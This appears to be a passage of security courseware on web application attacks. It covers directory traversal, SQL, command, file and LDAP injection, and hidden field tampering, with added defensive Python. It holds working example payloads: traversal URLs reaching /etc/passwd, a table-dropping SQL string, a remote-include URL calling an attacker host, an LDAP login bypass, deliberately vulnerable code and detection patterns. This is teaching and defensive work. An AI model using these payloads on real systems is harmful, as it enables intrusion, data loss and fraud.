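from decimal import Decimal, InvalidOperation
from urllib.parse import parse_qs, urlsplit

# Constructed sample data for this example.
CATALOG = {"widget": Decimal("99.90")}          # item -> server-side price
ACCOUNT_OWNER = {21: "jasons", 82: "alice"}      # profile id -> owning user
BALANCES = {21: Decimal("5000"), 82: Decimal("3000")}


def order_total(form: dict) -> Decimal:
    """Vulnerable pattern from the module: trusts the hidden 'price' field,
    so an edited form sets whatever price the client likes."""
    return Decimal(form["price"]) * int(form["qty"])


def order_total_server_priced(form: dict) -> Decimal:
    """Hardened: the client names the item, the server supplies the price.
    A submitted 'price' field is simply ignored."""
    qty = int(form["qty"])
    if qty < 1:
        raise ValueError("quantity must be positive")
    return CATALOG[form["item"]] * qty


def handle_debit(session_user: str, url: str) -> str:
    """Authorization check for cust.asp?profile=...&debit=...: the profile
    must belong to the authenticated user, whatever the URL says.
    Returns 'ok', 'forbidden', 'rejected', or 'bad request'."""
    params = parse_qs(urlsplit(url).query)
    try:
        profile = int(params["profile"][0])
        amount = Decimal(params["debit"][0])
    except (KeyError, ValueError, InvalidOperation):
        return "bad request"
    if ACCOUNT_OWNER.get(profile) != session_user:
        return "forbidden"      # tampered profile parameter
    if amount <= 0 or amount > BALANCES[profile]:
        return "rejected"
    BALANCES[profile] -= amount
    return "ok"
```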
Directory Traversal

When access is provided outside a defined application, there exists the possibility of unintended information disclosure or modification. Complex applications exist as application components and data, which are typically configured in multiple directories. An application has the ability to traverse these multiple directories to locate and execute the legitimate portions of an application. A directory traversal/forceful browsing attack occurs when the attacker is able to browse for directories and files outside the normal application access. A directory traversal/forceful browsing attack exposes the directory structure of an application, and often the underlying web server and operating system. With this level of access to the web application architecture, an attacker can:

• Enumerate the contents of files and directories
• Access pages that otherwise require authentication (and possibly payment)
• Gain secret knowledge of the application and its construction
• Discover user IDs and passwords buried in hidden files
• Locate source code and other interesting files left on the server
• View sensitive data, such as customer information

The following example uses "../" to back up several directories and obtain a file containing a backup of the web application:

    http://www.targetsite.com/../../../sitebackup.zip

This example obtains the "/etc/passwd" file from a UNIX/Linux system, which contains user account information:

    http://www.targetsite.com/../../../../etc/passwd

Let us consider another example where an attacker tries to access files located outside the web publishing directory using directory traversal:

    http://www.juggyboy.com/process.aspx=../../some dir/some file
    http://www.juggyboy.com/../../../../some dir/some file

The pictorial representation of a directory traversal attack is shown as follows:

FIGURE 13.7: Directory Traversal
Attacker requests /../../../etc/passwd from the vulnerable server code (fragment: <?php $theme = 'Jason.php';) and receives the password file (root, daemon and Jason entries).
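An added example (not part of the module) for the $theme include in Figure 13.7 and the URLs above: a base-directory check for a user-supplied file name, an allowlist alternative for an include parameter, and a detector for ".." segments in logged request URLs. BASE_DIR, the allowed theme names and the sample request lines are constructed for this example.

```python
import os
import re
from urllib.parse import unquote

# Constructed values: the directory the $theme include was meant to read
# from, and the theme files it is allowed to load.
BASE_DIR = os.path.abspath("/home/users/Jason")
ALLOWED_THEMES = {"Jason.php", "default.php"}

# A '..' segment bounded by a separator or the string's start/end; the
# preceding character may be '=' or '?', so process.aspx=../../x is caught.
TRAVERSAL_RE = re.compile(r"(?:^|[^A-Za-z0-9.])\.\.(?:[\\/]|$)")


def resolve_under_base(requested: str, base: str = BASE_DIR):
    """Return the absolute path for a user-supplied file name if it stays
    inside base, else None. The value is URL-decoded once (as a web
    framework would), joined to base and normalised, so '..' segments and
    absolute paths both collapse to a location outside base and are refused.
    The trailing separator stops /home/users/Jason2 passing as a prefix."""
    candidate = os.path.normpath(os.path.join(base, unquote(requested)))
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None


def pick_theme(requested: str, default: str = "Jason.php") -> str:
    """Allowlist alternative for an include parameter: anything not in the
    fixed set falls back to the default instead of being used as a path."""
    return requested if requested in ALLOWED_THEMES else default


def looks_like_traversal(url: str) -> bool:
    """Detection over access-log URLs: decode twice (catches one level of
    double encoding, a common obfuscation) and flag any '..' path segment."""
    return TRAVERSAL_RE.search(unquote(unquote(url))) is not None


# Constructed log lines: the module's URLs plus a benign and an encoded one.
SAMPLE_REQUESTS = [
    "http://www.targetsite.com/../../../sitebackup.zip",
    "http://www.targetsite.com/../../../../etc/passwd",
    "http://www.juggyboy.com/process.aspx=../../some dir/some file",
    "http://www.juggyboy.com/index.html",
    "http://www.juggyboy.com/process.aspx?file=..%252F..%252Fetc%252Fpasswd",
]


def flagged_requests(urls=SAMPLE_REQUESTS):
    """Return the subset of URLs a log review should escalate."""
    return [u for u in urls if looks_like_traversal(u)]
```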
41. Security Misconfiguration
Easy exploitation: Using misconfiguration vulnerabilities, attackers gain unauthorized access to default accounts, read unused pages, exploit unpatched flaws, and read or write unprotected files and directories.
Common prevalence: Security misconfiguration can occur at any level of an application stack, including the platform, web server, application server, framework, and custom code.
Example:
- The application server admin console is automatically installed and not removed
- Default accounts are not changed
- An attacker discovers the standard admin pages on the server, logs in with default passwords, and takes over

Developers and network administrators should check that the entire stack is configured properly, because security misconfiguration can happen at any level of it: the platform, web server, application server, framework, and custom code. For instance, a server that is not configured properly gives rise to problems that undermine the security of a website, including server software flaws, unpatched security flaws, unnecessary services left enabled, and improper authentication. Some of these problems can be detected easily with automated scanners. Attackers use default accounts, unused pages, unpatched flaws, unprotected files and directories, and similar weaknesses to gain unauthorized access. All unnecessary and unsafe features should be reviewed and, ideally, completely disabled so that outsiders cannot use them for malicious purposes.
All application files must be protected by proper authentication and strong security controls, or crucial information can leak to attackers. Examples of unnecessary features that should be disabled or changed include:
- The application server admin console is automatically installed and not removed
- Default accounts are not changed
As a result, an attacker discovers the standard admin pages on the server, logs in with default passwords, and takes over.
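As an added example of the check an administrator would run for the two misconfigurations listed above (this is not courseware code), the script below audits a constructed tomcat-users.xml for default or trivially weak credentials on console roles, and a constructed web.xml fragment for directory listings. The account names, passwords and the short default-credential list are assumptions made for the example, not a statement about what any product ships with.

```python
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml. The accounts, passwords and roles are invented
# to illustrate default-style credentials; a real file is read from disk.
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="tomcat" roles="manager-gui,admin-gui"/>
  <user username="admin" password="admin" roles="manager-gui"/>
  <user username="deployer" password="Q7v!pR2x#L9mW4" roles="manager-script"/>
</tomcat-users>
"""

# Constructed web.xml fragment with directory listings switched on.
SAMPLE_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee">
  <servlet>
    <servlet-name>default</servlet-name>
    <init-param>
      <param-name>listings</param-name>
      <param-value>true</param-value>
    </init-param>
  </servlet>
</web-app>
"""

# Assumption: a short illustrative list of pairs commonly tried against admin
# consoles. A real audit would use the wordlist your team maintains.
DEFAULT_CREDENTIALS = {
    ("tomcat", "tomcat"), ("tomcat", "s3cret"), ("admin", "admin"),
    ("admin", "password"), ("manager", "manager"), ("root", "root"),
}
CONSOLE_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin-gui", "admin-script"}


def _local(tag: str) -> str:
    """Strip a namespace prefix ({uri}tag -> tag) so lookups work with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text: str) -> list:
    """Return (username, finding) pairs for accounts that need attention."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        if (name, password) in DEFAULT_CREDENTIALS or password == name:
            findings.append((name, "default or username-equal password"))
        elif roles & CONSOLE_ROLES and len(password) < 12:
            findings.append((name, "short password on a console role"))
    return findings


def directory_listing_enabled(web_xml_text: str) -> bool:
    """True when the default servlet's listings init-param is set to true."""
    for param in ET.fromstring(web_xml_text).iter():
        if _local(param.tag) != "init-param":
            continue
        name = value = None
        for child in param:
            if _local(child.tag) == "param-name":
                name = (child.text or "").strip()
            elif _local(child.tag) == "param-value":
                value = (child.text or "").strip().lower()
        if name == "listings" and value == "true":
            return True
    return False
```

The namespace-stripping helper matters in practice: files that declare an xmlns produce tags like {http://tomcat.apache.org/xml}user, and a check that looks for a bare "user" silently finds nothing.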
43. Injection Flaws
Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query. Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access. Injection flaws are prevalent in legacy code, are often found in SQL, LDAP, and XPath queries, and can be discovered easily by application vulnerability scanners and fuzzers.
- SQL injection: injection of malicious SQL queries into user input forms
- Command injection: injection of malicious code through a web application
- LDAP injection: injection of malicious LDAP statements

Injection flaws are loopholes in a web application that allow unreliable data to be interpreted and executed as part of a command or query. Attackers exploit them by constructing malicious commands or queries that result in loss or corruption of data, lack of accountability, or denial of access. Injection flaws are prevalent in legacy code and are often found in SQL, LDAP, and XPath queries; they can be detected easily by application vulnerability scanners and fuzzers. By exploiting these flaws, an attacker can read, write, delete, and update data, whether or not it is relevant to that particular application. There are many types of injection flaws; some of them are as follows:
SQL injection: SQL injection is the most common website vulnerability on the Internet.
It is the technique of taking advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. The attacker injects malicious SQL queries into a user input form, usually either to gain unauthorized access to a database or to retrieve information directly from it.
Command injection: Command injection flaws are another type of web application vulnerability.
44. These flaws are highly dangerous. In this type of attack, the attacker injects malicious code via a web application.
LDAP injection: LDAP injection is an attack method that exploits websites that construct LDAP statements from user-supplied input. When an application fails to sanitize the user input, the LDAP statement can be modified, for example with the help of a local proxy. This results in the execution of arbitrary commands such as granting access to unauthorized queries and altering the content of the LDAP tree.
45. SQL Injection Attacks
- SQL injection attacks use a series of malicious SQL queries to manipulate the database directly
- An attacker can use a vulnerable web application to bypass normal security measures and obtain direct access to valuable data
- SQL injection attacks can often be executed from the address bar, from within application fields, and through queries and searches

SQL-injection-vulnerable server code (the user and message values are concatenated straight into the statement):
<?php
function save_email($user, $message)
{
  $sql = "INSERT INTO Messages (
    user, message
  ) VALUES (
    '$user', '$message'
  )";
  return mysql_query($sql);
}
?>
Payload that drops the Messages table when the statement reaches the database server (requires a driver that accepts stacked statements):
test');DROP TABLE Messages;--
Payload that inserts spammy data on behalf of other users:
test'),('user2','I am Jason'),('user3','You are hacked
Note: For complete coverage of SQL injection concepts and techniques, refer to Module 14: SQL Injection.

SQL injection attacks use command sequences from Structured Query Language (SQL) statements to control database data directly. Applications often use SQL statements to authenticate users to the application, validate roles and access levels, store and obtain information for the application and user, and link to other data sources. Using SQL injection methods, an attacker can use a vulnerable web application to avoid normal security measures and obtain direct access to valuable data.
The reason SQL injection attacks work is that the application does not validate input properly before passing it to a SQL statement. For example, the statement
SELECT * FROM tablename WHERE UserID = 2302
becomes the following with a simple SQL injection:
SELECT * FROM tablename WHERE UserID = 2302 OR 1=1
The expression OR 1=1 evaluates to TRUE for every row, often allowing the enumeration of all user ID values in the database. SQL injection attacks can often be entered from the address bar, from within application fields, and through queries and searches. SQL injection can allow an attacker to:
- Log in to the application without supplying valid credentials
46. - Perform queries against data in the database, often even data to which the application would not normally have access
- Modify the database contents, or drop the database altogether
- Use the trust relationships established between the web application components to access other databases
Figure 13.8: SQL Injection Attacks. The vulnerable save_email() function shown above is driven from a web browser over the Internet with the payload test');DROP TABLE Messages;-- (when this reaches the database server, it drops the Messages table) and with the payload test'),('user2','I am Jason'),('user3','You are hacked (inserts spammy data on behalf of other users).
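The following is an added example, not courseware code, that reproduces the three attacks above against an in-memory SQLite database and places the parameterised fix beside each vulnerable function. sqlite3's executescript() stands in for a driver that accepts stacked statements (sqlite3.execute() refuses them). One assumption to note: the spam payload as printed on the slide breaks out of the string after one value, which leaves the first row with a single column; the payload below moves the break point one value later so that every row has two columns and the insert succeeds. The table schema and seed rows are constructed for the example.

```python
import sqlite3

# Payloads. SPAM_USER is the slide's spam payload with the break point shifted
# so that each VALUES tuple carries two columns; DROP_USER is the slide's
# stacked-statement payload.
SPAM_USER = "test','-'),('user2','I am Jason'),('user3"
DROP_USER = "test','x');DROP TABLE Messages;--"


def fresh_db() -> sqlite3.Connection:
    """Constructed schema: the Messages table from the slide plus a Users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Messages (user TEXT, message TEXT)")
    db.execute("CREATE TABLE Users (UserID INTEGER, name TEXT)")
    db.executemany("INSERT INTO Users VALUES (?, ?)",
                   [(2302, "alice"), (2303, "bob"), (2304, "carol")])
    return db


def save_email_vulnerable(db, user: str, message: str) -> None:
    """Same construction as the PHP save_email(): values spliced into the SQL text."""
    sql = f"INSERT INTO Messages (user, message) VALUES ('{user}', '{message}')"
    # executescript() runs every statement in the string, like a driver with
    # multi-statement support; that is what lets DROP TABLE ride along.
    db.executescript(sql)


def save_email_safe(db, user: str, message: str) -> None:
    """Bound parameters: the driver sends the values separately from the SQL."""
    db.execute("INSERT INTO Messages (user, message) VALUES (?, ?)", (user, message))


def find_user_vulnerable(db, user_id: str) -> list:
    """The UserID = 2302 example; '2302 OR 1=1' returns every row."""
    return db.execute(f"SELECT UserID, name FROM Users WHERE UserID = {user_id}").fetchall()


def find_user_safe(db, user_id: str) -> list:
    """Type-convert first, then bind; non-numeric input never reaches the query."""
    return db.execute("SELECT UserID, name FROM Users WHERE UserID = ?",
                      (int(user_id),)).fetchall()


def messages(db) -> list:
    return db.execute("SELECT user, message FROM Messages ORDER BY rowid").fetchall()


def table_exists(db, name: str) -> bool:
    row = db.execute("SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?",
                     (name,)).fetchone()
    return row is not None
```

With the safe functions the same payloads are stored as literal text or rejected by int(): the injected SQL is never parsed as SQL.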
47. Command Injection Attacks
- Shell injection: An attacker tries to craft an input string to gain shell access to a web server. Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start(), and similar APIs.
- HTML embedding: This type of attack is used to deface websites virtually. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application. In HTML embedding attacks, user input to a web script is placed into the output HTML without being checked for HTML code or scripting.
- File injection: The attacker exploits this vulnerability and injects malicious code into system files: http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit?

Command injection flaws allow attackers to pass malicious code to different systems via a web application. The attacks include calls to the operating system through system calls, use of external programs through shell commands, and calls to backend databases through SQL. Scripts written in Perl, Python, and other languages can be injected into, and executed by, poorly designed web applications. If a web application uses any type of interpreter, attacks can be inserted to inflict damage. To perform their functions, web applications must use operating system features and external programs. Although many programs are invoked externally, a frequently used one is Sendmail.
When a piece of information from an HTTP request is passed to an external program, it must be carefully scrubbed, or the attacker can insert special characters, malicious commands, and command modifiers into it. The web application then blindly passes these characters to the external system for execution. SQL injection is a dangerous and rather widespread form of command injection. Command injection attacks are easy to carry out and to discover, but they are hard to understand.
Shell injection: To implement their various functions, web applications call other applications and programs, for example sending an email with the UNIX sendmail program. An attacker may be able to inject code into these programs. This kind of attack is dangerous
48. especially to web page security. These injections allow intruders to perform various types of malicious attacks against the user's server. An attacker tries to craft an input string to gain shell access to a web server. Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start(), and similar APIs.
HTML embedding: This type of attack is used to deface websites virtually. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application. In HTML embedding attacks, user input to a web script is placed into the output HTML without being checked for HTML code or scripting.
File injection: The attacker exploits this vulnerability and injects malicious code into system files: http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit
Users are allowed to upload files to the server through various applications, and those files can then be accessed over the Internet from anywhere in the world. If an uploaded file name ends with a .php extension and any user requests it, the application interprets it as a PHP script and executes it. This allows an attacker to execute arbitrary commands.
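Shell injection as described above, as an added example rather than courseware code: a lookup feature that concatenates a user-supplied host name into a shell command (the pattern behind system() and its relatives), beside the hardened form that validates the value and passes an argument list with no shell. The host-name grammar and the nslookup command are assumptions made for the example; the validation also rejects values beginning with "-", because even without a shell a leading dash is parsed as an option by the called program.

```python
import re
import shlex
import subprocess

# Host-name grammar: labels of letters, digits and hyphens, 1-63 characters,
# joined by dots, 253 characters overall. A value that fails this cannot carry
# ; | & $ ` ( ) < > newline, whitespace or a leading dash.
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)


def build_command_vulnerable(host: str) -> str:
    """String concatenation destined for shell=True: ; | && $( ) start new commands."""
    return "nslookup " + host


def build_command_quoted(host: str) -> str:
    """If a shell is unavoidable, quote the value so the shell sees one word.

    This stops command chaining but not option injection ('-X...' is still
    the first argument), so it is the fallback, not the preferred fix.
    """
    return "nslookup " + shlex.quote(host)


def validate_hostname(host: str) -> str:
    """Allowlist the value's shape; anything else is rejected, not escaped."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected host value: {host!r}")
    return host


def build_command_hardened(host: str) -> list:
    """argv list for subprocess without a shell: no word splitting, no metacharacters."""
    return ["nslookup", validate_hostname(host)]


def run_lookup(host: str) -> str:
    """Execute the hardened form with a bounded run time (not exercised offline)."""
    result = subprocess.run(build_command_hardened(host), capture_output=True,
                            text=True, timeout=10, check=False)
    return result.stdout
```

The list form keeps each argument intact regardless of its content; the regex is what keeps an attacker from turning the single argument into an option or a path the program was never meant to receive.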
49. Command Injection Example
http://juggyboy/cgi-bin/lspro/lspro.cgi?hit_out=1036
Form fields as submitted by the attacker: User Name: Addison; Email Address: addi@juggyboy.com; Site URL: www.juggyboy.com; Banner URL: www.juggyboy.com/banner.gif||newpassword||1036|60|468; Password: newpassword
Poor input validation in the server script was exploited in this attack, which uses the database INSERT and UPDATE record commands.
Malicious code: www.juggyboy.com/banner.gif||newpassword||1036|60|468
- The attacker enters malicious code (an account number) together with a new password
- The last two sets of numbers are the banner size
- Once the attacker clicks the submit button, the password for account 1036 is changed to "newpassword"
- The server script assumes that only the URL of the banner image file is inserted into that field

The following is an example of command injection. To perform the attack, the attacker first enters the malicious code (an account number) together with a new password in the banner URL field; the last two sets of numbers are the banner size. Once the attacker clicks the submit button, the password for account 1036 is changed to "newpassword", because the server script assumes that only the URL of the banner image file is inserted into that field.
50. Figure 13.9: Command Injection Example. The attacker launches the code injection attack through the lspro.cgi form (User Name Addison, Email Address addi@juggyboy.com, Site URL www.juggyboy.com, Banner URL www.juggyboy.com/banner.gif||newpassword||1036|60|468, Password newpassword). Poor input validation in the server script was exploited in this attack, which uses the database INSERT and UPDATE record commands.
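The lspro.cgi attack above depends on the script storing the form as one delimited record and then reading fields back by position. The page does not show the script's record layout, so the example below (added here, not courseware code) assumes a "|"-separated record in which the password and account number follow the banner URL; the account store is a constructed dictionary. The vulnerable path reproduces the takeover of account 1036 from an attacker logged in as 2077; the hardened path quotes the delimiter with the csv module and refuses to update any account other than the one bound to the session.

```python
import csv
import io

# Assumed record layout: the fields after banner_url are exactly the ones the
# payload supplies, so injected values line up with password and account.
FIELDS = ("name", "email", "site_url", "banner_url",
          "password", "account", "height", "width")


def fresh_accounts() -> dict:
    """Constructed account store standing in for lspro.cgi's database table."""
    return {
        "1036": {"name": "victim", "password": "original-secret"},
        "2077": {"name": "Addison", "password": "attacker-pass"},
    }


# The form as the attacker submits it; the banner_url value is the slide's
# payload with single "|" separators, account 2077 is the attacker's own.
ATTACK_FORM = {
    "name": "Addison",
    "email": "addi@juggyboy.com",
    "site_url": "www.juggyboy.com",
    "banner_url": "www.juggyboy.com/banner.gif|newpassword|1036|60|468",
    "password": "newpassword",
    "account": "2077",
    "height": "60",
    "width": "468",
}


def build_record_vulnerable(form: dict) -> str:
    """Join the fields with the delimiter and no quoting."""
    return "|".join(form[f] for f in FIELDS)


def parse_record_vulnerable(line: str) -> dict:
    """Split on the delimiter; zip() silently drops the surplus fields."""
    return dict(zip(FIELDS, line.split("|")))


def update_vulnerable(accounts: dict, form: dict) -> str:
    """Store then re-read the record and UPDATE whichever account it names."""
    rec = parse_record_vulnerable(build_record_vulnerable(form))
    accounts[rec["account"]]["password"] = rec["password"]
    return rec["account"]


def build_record_safe(form: dict) -> str:
    """csv quotes any field that contains the delimiter, so it stays one field."""
    buf = io.StringIO()
    csv.writer(buf, delimiter="|", quoting=csv.QUOTE_MINIMAL,
               lineterminator="").writerow([form[f] for f in FIELDS])
    return buf.getvalue()


def parse_record_safe(line: str) -> dict:
    parts = next(csv.reader([line], delimiter="|"))
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return dict(zip(FIELDS, parts))


def update_safe(accounts: dict, form: dict, session_account: str) -> str:
    """Authorise against the session, not the submitted account number."""
    if form["account"] != session_account:
        raise PermissionError("form names an account the session does not own")
    rec = parse_record_safe(build_record_safe(form))
    accounts[rec["account"]]["password"] = rec["password"]
    return rec["account"]
```

Two independent fixes are shown because each closes a different hole: quoting keeps the banner URL inside its own field, and the session check means that even a malformed record cannot pick a victim.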
51. File Injection Attack
File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file instead of a presumably trusted file from the local file system. In the figure, the client code (a form with a DRINK selector) runs in a browser, the vulnerable PHP code on the server includes a file named after the DRINK parameter, and the attacker injects a remotely hosted file at www.jasoneval.com containing an exploit:
http://www.juggyboy.com/orders.php?DRINK=http://jasoneval.com/exploit?

Users are allowed to upload files to the server through various applications, and those files can be accessed over the Internet from anywhere in the world. If an uploaded file name ends with a .php extension and any user requests it, the application interprets it as a PHP script and executes it. This allows an attacker to execute arbitrary commands. File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file instead of a presumably trusted file from the local file system.
Consider the following client code running in a browser:
<form method="get">
<select name="DRINK">
<option value="pepsi">pepsi</option>
<option value="coke">coke</option>
</select>
<input type="submit">
</form>
Vulnerable PHP code:
<?php
$drink = 'coke';
if (isset($_GET['DRINK']))
    $drink = $_GET['DRINK'];
require($drink . '.php');
?>
52. To exploit the vulnerable PHP code, the attacker injects a remotely hosted file at www.jasoneval.com containing an exploit.
Exploit URL:
http://www.juggyboy.com/orders.php?DRINK=http://jasoneval.com/exploit?
The trailing ? makes the appended .php part of the query string on the attacker's server rather than part of the path, and remote inclusion of this kind only succeeds when the server's PHP has allow_url_include enabled; with it disabled the same parameter is still usable for local file inclusion of any .php file the path can reach.
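As an added example, not courseware code, the functions below show what require($drink . '.php') actually receives for the exploit URL, the allowlist that is the standard fix (map the parameter onto the two files the form offers and nothing else), and a triage rule for spotting include-injection attempts in request logs. The template directory and its contents are constructed in a temporary directory, and the set of stream-wrapper schemes checked is an assumption for the example.

```python
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

# Constructed stand-in for the PHP files orders.php would require(): a temporary
# directory holding pepsi.php and coke.php with plain text instead of code.
TEMPLATE_DIR = Path(tempfile.mkdtemp(prefix="rfi_demo_"))
for _name in ("pepsi", "coke"):
    (TEMPLATE_DIR / f"{_name}.php").write_text(f"You ordered {_name}")

ALLOWED_DRINKS = frozenset(("pepsi", "coke"))  # exactly the values the <select> offers

# Assumption: schemes worth flagging in a DRINK-style parameter. http/https/ftp
# fetch remote code; php://, data:, expect:, zip: and phar: are PHP stream
# wrappers that reach local content or execute without any remote host.
WRAPPER_SCHEMES = frozenset(("http", "https", "ftp", "ftps", "php", "data",
                             "file", "expect", "zip", "phar"))


def resolve_include_vulnerable(drink: str) -> str:
    """The string require() gets: the raw parameter with '.php' appended.

    Nothing ties the value to the two options in the form, so a URL passes
    straight through and the trailing '?' pushes '.php' into its query string.
    """
    return drink + ".php"


def include_hardened(drink: str) -> str:
    """Map the parameter onto a fixed set of server-side files; reject the rest."""
    if drink not in ALLOWED_DRINKS:
        raise ValueError(f"unknown drink {drink!r}")
    return (TEMPLATE_DIR / f"{drink}.php").read_text()


def is_include_injection_attempt(value: str) -> bool:
    """Log/WAF triage: a wrapper scheme, a path separator or a NUL byte in the value."""
    if urlsplit(value).scheme.lower() in WRAPPER_SCHEMES:
        return True
    return any(ch in value for ch in "/\\\x00")
```

Escaping is not the fix here: the parameter is a file name, and the only safe shape for a file name chosen by the client is a key into a table the server controls.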
53. What Is LDAP Injection?
An LDAP injection technique is used to take advantage of non-validated web application input vulnerabilities to pass LDAP filters used for searching Directory Services, in order to obtain direct access to the databases behind an LDAP tree.
Filter syntax: (attributeName operator value)
Operator: Example
=: (objectclass=user)
>=: (mdbStorageQuota>=100000)
<=: (mdbStorageQuota<=100000)
~=: (displayName~=Foeckeler)
*: (displayName=*John*)
AND (&): (&(objectclass=user)(displayName=John))
OR (|): (|(objectclass=user)(displayName=John))
NOT (!): (!objectClass=group)
(Strictly, the NOT operator wraps a complete filter, so the well-formed spelling is (!(objectClass=group)); the table shows the form as printed on the slide.)
LDAP Directory Services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries. LDAP is based on the client-server model, and clients can search the directory entries using filters.

An LDAP (Lightweight Directory Access Protocol) injection attack works in the same way as a SQL injection attack. All input to LDAP queries must be properly filtered; otherwise the vulnerability allows an attacker to execute unauthorized queries or modify the directory contents. LDAP injection attacks exploit web-based applications that construct LDAP statements from user input, often by rewriting the request with a local proxy; the LDAP statement is altered whenever the application fails to sanitize that input. Directory services store and organize information based on its attributes, and the information is hierarchically organized as a tree of directory entries.
LDAP is based on the client-server model, and clients can search the directory entries using filters.
54. Figure 13.10: LDAP Injection (the filter syntax (attributeName operator value) and the operator/example table listed above).
55. How LDAP Injection Works
LDAP injection attacks are similar to SQL injection attacks but exploit user parameters to generate an LDAP query. To test whether an application is vulnerable to LDAP code injection, send the server a query that generates invalid input. If the LDAP server returns an error, the application can be exploited with code injection techniques.
Normal operation: the client sends a normal query to the LDAP server and receives the normal result. Operation with code injection: the client sends a normal query plus injected code and receives the normal result and/or additional information.
If an attacker enters the valid user name juggyboy and injects juggyboy)(&)), the filter string becomes (&(USER=juggyboy)(&))(PASS=blah)). Only the first filter is processed by the LDAP server, that is, only (&(USER=juggyboy)(&)) is evaluated. This query is always true, because the empty AND filter (&) is defined as absolute true, so the attacker logs in to the system without a valid password.
Account Login form: Username juggyboy)(&)), Password blah, Submit.

LDAP injection attacks are commonly used against web applications, and they apply to any application that uses some kind of user input to generate LDAP queries. To test whether an application is vulnerable to LDAP code injection, send the server a query that generates invalid input; if the LDAP server returns an error, the application can be exploited with code injection techniques. Depending on the implementation of the target, one can try to achieve:
- Login bypass
- Information disclosure
- Privilege escalation
- Information alteration
56. Figure 13.11: Normal operation (the client sends a Normal Query to the LDAP server and receives the Normal Result).
Figure 13.12: Operation with code injection (the client sends a Normal Query plus Code Injection and receives the Normal Result and/or Additional Information).
Attack: If an attacker enters a valid user name of juggyboy and injects juggyboy)(&)), the filter string becomes (&(USER=juggyboy)(&))(PASS=blah)). Only the first filter is processed by the LDAP server; that is, only the query (&(USER=juggyboy)(&)) is evaluated. This query is always true, and the attacker logs in to the system without a valid password.
Figure 13.13: Attack (Account Login form with Username juggyboy)(&)) and Password blah submitted to the LDAP server).
57. Hidden Field Manipulation Attack
Normal request: http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=200.00
Attack request: http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=2.00
HTML code:
<form method="post" action="page.aspx">
<input type="hidden" name="PRICE" value="200.00">
Product name: <input type="text" name="product" value="Juggyboy Shirt"><br>
Product price: 200.00<br>
<input type="submit" value="submit">
</form>
- When a user makes selections on an HTML page, the selection is typically stored as form field values and sent to the application as an HTTP request (GET or POST)
- HTML can also store field values as hidden fields, which are not rendered to the screen by the browser but are collected and submitted as parameters during form submission
- Attackers can examine the HTML code of the page and change the hidden field values in order to change the POST request sent to the server
Form as rendered: Product Name: Juggyboy Shirt; Product Price: 200; Submit

Hidden field manipulation attacks are mostly used against e-commerce websites today, and many online stores face this problem. In every client session, developers use hidden fields to store client information, including the price of the product (discount rates included).
When developing such programs, developers assume that the applications they have built are safe, but an attacker can manipulate the price of the product and complete a transaction at the altered price rather than the actual one. For example, on eBay a particular mobile phone is on sale for $1000, and the attacker, by altering the price, gets it for only $10. This is a huge loss for website owners. To protect their networks from attacks, website owners use the latest antivirus software, firewalls, intrusion detection systems, and so on, but none of these inspect the meaning of a form value; if a website is attacked, it often also loses credibility in the market. When a user requests a web page and makes choices on it, the choices are saved as form field values and delivered to the application as an HTTP request (GET or POST). HTML pages commonly keep values in hidden fields, which are not displayed on the user's screen but are submitted as parameters when the form is posted. Attackers can examine the HTML code of the page and change the hidden field values in order to change the POST request sent to the server:
<input type="hidden" name="PRICE" value="200.00">
58. Product name: <input type="text" name="product" value="Juggyboy Shirt"><br>
Product price: 200.00<br>
<input type="submit" value="submit">
</form>
1. Open the HTML page in an HTML editor.
2. Locate the hidden field (e.g., <input type="hidden" name="price" value="200.00">).
3. Modify its content to a different value (e.g., <input type="hidden" name="price" value="2.00">).
4. Save the HTML file locally and open it in a browser (the form's action must point at the target site for the saved copy to submit there; an intercepting proxy makes the same change without saving the page).
5. Click the Buy button to perform electronic shoplifting via hidden field manipulation.
Figure 13.14: Hidden Field Manipulation Attack. Normal request: http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=200.00 (hidden field PRICE = 200.00). Attack request: http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=2.00. The HTML code is as shown above.
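The defence against the five steps above is on the server, never in the page. The added example below (not courseware code) processes the two request strings from the slide three ways: the vulnerable handler that believes the price field, a handler that verifies an HMAC the server attached to the hidden field when it rendered the form, and the simplest handler, which ignores the submitted price and looks the product up. The catalogue, the per-deployment key and the lowercase field names are assumptions made for the example.

```python
import hashlib
import hmac
import secrets
from html import escape
from urllib.parse import parse_qs

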